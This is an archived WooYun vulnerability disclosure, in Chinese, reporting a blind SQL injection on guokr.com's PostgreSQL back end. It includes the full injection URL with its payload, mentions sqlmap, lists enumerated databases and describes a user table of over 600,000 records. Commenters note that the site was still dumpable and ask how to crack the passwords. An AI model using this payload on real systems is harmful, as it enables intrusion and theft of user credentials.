当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2012-015128

漏洞标题:果壳主站SQL注射,可获取站内用户数据

相关厂商:果壳传媒

漏洞作者: 牛奶坦克

提交时间:2012-11-22 18:07

修复时间:2012-11-27 18:08

公开时间:2012-11-27 18:08

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2012-11-22: 细节已通知厂商并且等待厂商处理中
2012-11-27: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

一直很喜欢果壳网,看了下 http://www.wooyun.org/corps/%E6%9E%9C%E5%A3%B3%E4%BC%A0%E5%AA%92
没啥给力的漏洞,就简单的看看主站,结果发现了一个注射,PostgreSQL的!
看到了个用户信息,密码和access_token的表。。。

详细说明:

注射点:

http://www.guokr.com/group/posts/38/members/index.php?wd=123'%20and%20(SELECT%20COUNT(DISTINCT(datname))%20FROM%20pg_database)%3E5%20and%20'a'='a


盲注,用sqlmap的sqlshell跑跑

1.png


挺高的版本。

3.png


4.png


available databases [6]:
[*] backend
[*] postgres
[*] template0
[*] template1
[*] watson
[*] youth


没什么太有价值的东西,准备闪人的时候又like一下含有password字段的表,结果就这一次查询,改变了检测结果。

2.png


user_alias这个表里有啥?

5.png


漏洞证明:

此表记录数量:

6.png


60多万额,,
查询5条出来

7.png


结束,今天到这里,感觉问题不是单独存在的,这次这个点稍微有点难利用。两个在zone看到的PostgreSQL技巧也没用上,惭愧啊。

修复方案:

字符型注射检测。

版权声明:转载请注明来源 牛奶坦克@乌云

漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2012-11-27 18:08

厂商回复:

漏洞Rank:16 (WooYun评价)

最新状态:

2012-11-30:这个问题已经修复了,感谢大家对果壳的关心/关注和反馈。

漏洞评价:

评论

  1. 2012-11-22 18:20 | xsser 认证白帽子 ( 普通白帽子 | Rank:254 漏洞数:18 | 当我又回首一切,这个世界会好吗?)

    毫不留情的关注

  2. 2012-11-22 18:31 | qiaoy ( 普通白帽子 | Rank:110 漏洞数:16 )

    毫不留情的Mark

  3. 2012-11-22 19:00 | 斯文的鸡蛋 ( 普通白帽子 | Rank:173 漏洞数:41 | 我在这头,你在那头~)

    你妹!我在那有账号的

  4. 2012-11-22 19:59 | xsser 认证白帽子 ( 普通白帽子 | Rank:254 漏洞数:18 | 当我又回首一切,这个世界会好吗?)

    @斯文的鸡蛋 果壳性情嘛

  5. 2012-11-22 20:18 | se55i0n ( 普通白帽子 | Rank:1567 漏洞数:173 )

    围观~

  6. 2012-11-22 21:34 | Passer_by ( 实习白帽子 | Rank:97 漏洞数:21 | 问题真实存在但是影响不大(腾讯微博Passer...)

    发现果壳网前面的漏洞全都是已忽略啊!

  7. 2012-11-22 21:43 | 小菜 ( 路人 | Rank:6 漏洞数:2 | 菜鸟一个,等有一天变成大牛了,还是叫小菜...)

    有没有明文密码啊?

  8. 2012-11-22 22:05 | 斯文的鸡蛋 ( 普通白帽子 | Rank:173 漏洞数:41 | 我在这头,你在那头~)

    @xsser 都有~嘿嘿

  9. 2012-11-22 22:06 | 斯文的鸡蛋 ( 普通白帽子 | Rank:173 漏洞数:41 | 我在这头,你在那头~)

    @xsser 苦逼了,我还是果壳达人= =!

  10. 2012-11-27 19:16 | Sunshine ( 实习白帽子 | Rank:51 漏洞数:10 | Nothing.)

    啥叫无影响。。。

  11. 2012-11-27 20:17 | krbl ( 实习白帽子 | Rank:97 漏洞数:13 | ♦♠♣♫♪☼☻☺ஐ♥♀♂☆๑۩۞۩๑☜☞...)

    毫不留情的忽略~~

  12. 2012-11-27 20:47 | 斯文的鸡蛋 ( 普通白帽子 | Rank:173 漏洞数:41 | 我在这头,你在那头~)

    毫不留情的忽略~果壳啊,对你忒失望

  13. 2012-11-27 23:02 | Rona ( 实习白帽子 | Rank:88 漏洞数:23 | test)

    这么密码,能破吗?有啥方法

  14. 2012-11-28 08:57 | qiaoy ( 普通白帽子 | Rank:110 漏洞数:16 )

    对果壳的好印象一落千丈,忽略了偷着改有意思吗?

  15. 2012-11-28 09:59 | Rona ( 实习白帽子 | Rank:88 漏洞数:23 | test)

    @qiaoy 没改,依然能拖。

  16. 2012-11-28 11:04 | qiaoy ( 普通白帽子 | Rank:110 漏洞数:16 )

    @Rona 试了一下,果然还未修补。。。。这真令人搞不懂。。。。

  17. 2012-11-30 14:37 | 果壳传媒(乌云厂商)

    我接手这里的问题处理,这个问题已经知道了,乌云这边我们会一步一步的处理,同时感谢大家的关注和反馈

  18. 2012-11-30 15:04 | 果壳传媒(乌云厂商)

    @Rona @qiaoy @斯文的鸡蛋 @krbl @Sunshine @xsser @se55i0n @小菜已经修复了,感谢大家的关注和反馈

  19. 2012-11-30 15:16 | Rona ( 实习白帽子 | Rank:88 漏洞数:23 | test)

    @果壳传媒 这态度不错,挺喜欢果壳的。

  20. 2012-11-30 18:03 | 牛奶坦克 ( 普通白帽子 | Rank:355 漏洞数:21 | 晚安,牛奶)

    @果壳传媒 为啥不确认的。。。

  21. 2012-12-03 16:27 | 果壳传媒(乌云厂商)

    @牛奶坦克 乌云上面5天没有动静的BUG自动变成忽略了,这是我们的疏忽,不过我们已经做出更正,正在处理大家报的BUG,感谢大家的反馈了